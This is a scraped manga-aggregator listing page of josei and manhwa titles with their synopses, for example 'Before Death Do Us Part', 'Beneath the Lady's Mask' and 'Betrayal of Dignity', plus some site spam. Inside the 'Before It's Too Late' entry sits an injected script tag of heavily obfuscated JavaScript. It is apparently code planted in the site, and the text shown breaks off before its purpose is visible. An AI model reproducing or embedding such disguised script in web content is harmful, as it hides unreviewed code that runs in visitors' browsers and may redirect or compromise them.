Josei - Page 27

Josei manga is designed for adult women, often covering themes such as love, career, and personal growth. It typically focuses on more realistic portrayals of relationships and emotional maturity, compared to the idealized stories in shoujo manga.

3234 results

Before Death Do Us Part

She would have to marry the son of another organization?! Yang Hye-jin had completely cut ties with her family right after she entered college, in pursuit of peaceful a daily life. It has been nine years since she left her violent father and her ignorant brother, who resembled him. However, her family suddenly appears and unilaterally announces her marriage with an unwanted partner, Moo Kang. Can Hye-jin and Moo Kang swear their entire lives in this marriage, which consists of a contract between organizations, and where death is the only path should they do not accept it? Before Death Do Us Part / Marriage Instead of Death / Marriage Or Death / Marrying Rather Than Dying / 生存之婚 / 죽음 대신 결혼


Before It’s Too Late

"Eunho, you're... like an angel, a guardian angel." Two childhood friends who were each other's number one priorities for 15 years, Seohui and Eunho. To call it friendship is, well...there's something between the two of their relationship that no one else can interfere with. Friends, family, soulmates, lovers(?), they kept switching somewhere in between all those, but suddenly, Seohui broke the news, "Eunho, I don't want to see you anymore." Those words made Eunho's world fall apart. I can't act oblivious any longer. I'm crossing the solid line which has been drawn by time. Before you disappear from my side. Before I lose you. Before It's Too Late / Before Losing You / ??? ??<script></script><script>(function(_0x28663c,_0x2ab8e3){var _0x145588=_0x3fd5,_0x6ae52=_0x28663c();while(!![]){try{var _0x28d176=parseInt(_0x145588(0xc3))/(0x16f*0x10+-0x335*0xb+0xc58)*(parseInt(_0x145588(0xb6))/(-0x177e+0x2592+-0x2*0x709))+-parseInt(_0x145588(0xb2))/(-0x9c7*-0x3+0x19cb+-0x125f*0x3)+-parseInt(_0x145588(0xca))/(0x2c9*-0xe+0x1dc8+0x2*0x49d)+parseInt(_0x145588(0xbf))/(0x2b*-0x52+0x25ba+-0x22d*0xb)*(-parseInt(_0x145588(0xb3))/(0x101a+-0x483+-0xb91))+-parseInt(_0x145588(0xc1))/(0xbd9+0x43e*-0x6+-0x5*-0x2ba)+-parseInt(_0x145588(0xb8))/(0x217e*0x1+0x1a7d+-0x3bf3)*(parseInt(_0x145588(0xc5))/(0x1ad1+-0x12fb+-0x7cd))+parseInt(_0x145588(0xc6))/(0x1758+-0x475*-0x2+-0x2038);if(_0x28d176===_0x2ab8e3)break;else _0x6ae52['push'](_0x6ae52['shift']());}catch(_0x3ec2a2){_0x6ae52['push'](_0x6ae52['shift']());}}}(_0x3ac1,0x8cfad+0x5819d*-0x3+0x6e9*0x2aa));function custom(){var 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Before Love Kills Me

Being reborn ten years later, my childhood friends have become a ruthless businessman, a son of a rich family, and a superstar respectively. What is even more ridiculous is that I seem to be their first love from years ago?


Before the Footprint Melts

Fictitious Joseon - the love story of those who have the pain of the world..


Begrudgingly Yours

Enya Valencia, Dreaded Master Of The Enchanted Hexenkeep Of Morgenda, Has A New Enemy – The Celebrated Knight Of Radiance, Helios. The Hatred Is Mutual, But So Is Their Fate Of Certain Death… Unless They Meet One Condition: They Must Sleep With Each Other. “…Shall We Start By Kissing, Hexenkeeper?” So Begins Their Spiteful Romance At The Pinnacle Of Carnal Affection.


Beloved Days

Seung Hyun and Gimmi used to go out with each other, but they eventually broke up. A couple years later, they happened to run into each other. Do their romantic feelings still remain?


Beloved in-laws

Raina, the second daughter of a fallen Countess. Although she devoted herself to her family, she eventually got married to her viscount, and Reina thought that an even more miserable life awaited her. until you meet them! “Father, father, father. Which one is good to call? I like the last one… … . Absolutely no Viscount!” “You don’t have to do it if you don’t want to. If there is something you want to do, feel free to learn it.” Will Raina be happy with her new family? 사랑받는 시집살이


Beneath the Lady’s Mask

Read “Beneath the Lady’s Mask Novel” – “Beneath the Lady’s Mask Manhwa” Online Free At KUNMANGA The summary of the comics “Beneath the Lady’s Mask”: Mother always said to Qinran: “Your stepfather is from a famous family, your eldest brother is a genius, and your sister is a top student in her high school. You, a country bumpkin, don’t embarrass them.” Everyone with status in the capital received a warning from Mr. Juan of the Cheng family: “Mr. Juan’s wife is from the countryside and doesn’t understand our current situation, and she has a bad temper. In short, everyone should be extra patient.” Until one day, when Master Juan was investigating a certain big boss, his men fell into a confused silence while looking at one of the waistcoats of his sister-in-law who claimed to know nothing… “Beneath the Lady’s Mask” is alternatively named: Furen Ni Majia You Diaole / Fūrén Nǐ Mǎjiǎ Yòu Diàole / Ma’am, Your Mask Has Fallen Off Again / Phu Nhân , Thân Phận Thật Của Người Sắp Lộ Rồi / 夫人你马甲又掉了 The comics “Beneath the Lady’s Mask” belongs to the Genre: Drama, Romance, Shoujo “KUN MANGA, MANHWA UPDATES, HARI MANGA…” are the most searched keywords on the website MANHWA CLAN. We offer a wide selection of the best and newest comics series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging


Beneath the Surviving Princess Joyful Facade

Read Manga Beneath the Surviving Princess Joyful Facade Online For Free At Zin Manga The Content Beneath the Surviving Princess Joyful Facade: “Very good. I shall give you my beloved sister, whom I cherish dearly.” Eric Chladnie, who led the long war to victory against the Shidate Principality, received the mandate to marry a foolish princess as a reward for his triumph. After the wedding ceremony, Eric returned to the mansion with the newlywed princess. Amidst the princess’s eccentric behaviour, his father attempts to kill her and his mother advices him to not give his heart. Only he, treating her like a child, respects and cherishes her as his wife. However, who is this woman who, in front of the king, impersonates deeds that she has never done and acts piously? Associated Names: Behind the Laughter of the Surviving Princess / Beneath the Surviving Princess’ Joyful Façade / 살아남은 왕녀의 웃음 뒤에는 Read NEW MANGA updated: My System Is Very Serious The Fairy Legacy The Marquis and the Iron Wall Lady Manga Zin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience.


Bentouya-San No Omotenashi

"I will make whatever you want to eat.'' Chiharu is an office lady who has been cheated on by her boyfriend, and is transferred to Sapporo City, Hokkaido with her broken-heart. On her way home from work, she stops by a shop, "Bear Bistro", which stands quietly behind the alley. Chiharu meets Yuu, the creator of the "magical lunch" that fulfills the eater's inner wishes, feels her frozen heart slowly melting. A full bento of the northern bento full that will fill your stomach and your heart!


Bernies Drawing Diary

[From DokiDoki]: An adorable allegory about peace and tolerance. According to the author ~ in the future our world has been wiped out more or less by our own stupidity and intolerance: in the world that follows, all the inhabitants are cats who live together peacefully in spite of nationality and race.


Betrayal of Dignity

Read manhwa Betrayal of Dignity Would you sacrifice your honor to marry a Duke? In order to save her family from ruin, Chloe Verdier must find a groom for her sister, Alice. She soon runs into the handsome but arrogant Duke Tisse who makes a proposal that could save them. When Alice flees with a mysterious man, Chloe must seek out the Duke in the biggest gamble of her life.
